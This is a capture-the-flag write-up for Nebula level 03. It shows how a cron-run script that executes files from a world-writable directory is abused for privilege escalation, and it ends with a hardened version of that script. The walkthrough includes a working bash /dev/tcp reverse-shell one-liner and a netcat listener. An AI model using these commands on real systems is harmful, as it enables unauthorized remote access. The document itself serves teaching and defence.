We start off with understanding what is being asked of us:
As we read the About section, we see that we need to check the home directory for 'flag03' and take note of the files. Additionally, there is a crontab that is called every couple of minutes.
With our task in hand, we SSH into the node and move to the /home/flag03 directory:
level03@nebula:~$ cd /home/flag03/
level03@nebula:/home/flag03$ ls -lah
total 5.5K
drwxr-x--- 3 flag03 level03  103 2011-11-20 20:39 .
drwxr-xr-x 1 root   root     120 2012-08-27 07:18 ..
-rw-r--r-- 1 flag03 flag03   220 2011-05-18 02:54 .bash_logout
-rw-r--r-- 1 flag03 flag03  3.3K 2011-05-18 02:54 .bashrc
-rw-r--r-- 1 flag03 flag03   675 2011-05-18 02:54 .profile
drwxrwxrwx 2 flag03 flag03     3 2012-08-18 05:24 writable.d
-rwxr-xr-x 1 flag03 flag03    98 2011-11-20 21:22 writable.sh
level03@nebula:/home/flag03$
Two things stand out: a world-writable directory, writable.d, and a script, writable.sh, that is owned by flag03.
We cat the script to see what it should do:
level03@nebula:/home/flag03$ cat writable.sh
#!/bin/sh
for i in /home/flag03/writable.d/* ; do
    (ulimit -t 5; bash -x "$i")
    rm -f "$i"
done
level03@nebula:/home/flag03$
This is a very basic script. Its for loop iterates over every file in /home/flag03/writable.d. For each file it first runs "ulimit", which will "get or set user limits"; the -t flag sets the maximum CPU time, here 5 seconds. Because the ulimit and the bash call sit inside parentheses, the limit applies only to that subshell. Within it, bash is invoked to execute the file from writable.d, and afterwards the file is removed. Nothing in the script checks who created the file it is about to run.
My assumption here is that the crontab is calling the writable.sh script every couple of minutes. Depending on the owner of the crontab, it will execute as that user. However, we are unable to know this information.
So, what I do is create a reverse shell file and place it into the writable.d directory:
level03@nebula:/home/flag03$ echo "bash -i >& /dev/tcp/192.168.56.1/4444 0>&1" > /home/level03/shell
level03@nebula:/home/flag03$ cp /home/level03/shell writable.d/
level03@nebula:/home/flag03$ ls -lah writable.d/
total 4.0K
drwxrwxrwx 1 flag03  flag03  60 2017-02-25 14:07 .
drwxr-x--- 1 flag03  level03 60 2011-11-20 20:39 ..
-rw-rw-r-- 1 level03 level03 43 2017-02-25 14:07 shell
level03@nebula:/home/flag03$
At this time, I also set up my listener on the same port:
eric@geoda:~$ nc -nlvp 4444
listening on [any] 4444 ...
I then wait:
eric@geoda:~$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [192.168.56.1] from (UNKNOWN) [192.168.56.106] 55958
bash: no job control in this shell
flag03@nebula:~$ whoami
whoami
flag03
flag03@nebula:~$ getflag
getflag
You have successfully executed getflag on a target account
flag03@nebula:~$
As hoped, my shell hits and I am running as flag03! I run getflag to confirm.
This exercise shows how a cron job can be exploited. It also shows that a world-writable directory owned by a higher-privilege user can itself be exploited when that user's scheduled script executes whatever it finds there.
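A hardened version of the writable.sh pattern, as an added example that is not part of this write-up or of the Nebula exercise: it refuses to run anything from the drop directory unless the directory is not world-writable and the file is a regular file owned by the expected account and writable only by that account. The directory and account are passed as arguments, and the self-check uses a constructed temporary directory rather than real cron.

```shell
#!/bin/sh
# Hardened variant of writable.sh (added example). Before handing a dropped
# file to bash, reject anything a less privileged user could have planted.

# Print the paths of files in $1 that are safe for account $2 to execute.
# Returns 1 and prints nothing if the directory itself is world-writable.
safe_jobs() {
    dir=$1
    owner=$2
    # A world-writable drop directory lets anyone add a file: refuse outright.
    if [ -n "$(find "$dir" -maxdepth 0 -perm -o+w)" ]; then
        echo "refusing: $dir is world-writable" >&2
        return 1
    fi
    # Only regular files (symlinks are skipped) owned by $owner that neither
    # group nor others can modify.
    find "$dir" -maxdepth 1 -type f -user "$owner" \
        ! -perm -g+w ! -perm -o+w
}

# Drop-in replacement for the loop in writable.sh, using the filter above.
run_jobs() {
    safe_jobs "$1" "$2" | while IFS= read -r i; do
        (ulimit -t 5; bash -x "$i")
        rm -f "$i"
    done
}

# Self-check on a constructed directory: one well-owned 0644 file and one
# world-writable "planted" file; then the directory is made world-writable.
demo() {
    tmp=$(mktemp -d)
    me=$(id -un)
    printf 'echo ok\n' > "$tmp/good.sh";    chmod 644 "$tmp/good.sh"
    printf 'echo bad\n' > "$tmp/planted.sh"; chmod 666 "$tmp/planted.sh"
    chmod 755 "$tmp"
    safe_jobs "$tmp" "$me"                    # lists only good.sh
    chmod 777 "$tmp"
    safe_jobs "$tmp" "$me" || echo "directory rejected"
    rm -rf "$tmp"
}
```

Running demo lists only the 0644 file on the first call and prints the refusal on the second, which is the check writable.sh never makes.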
Thanks for reading!
-geoda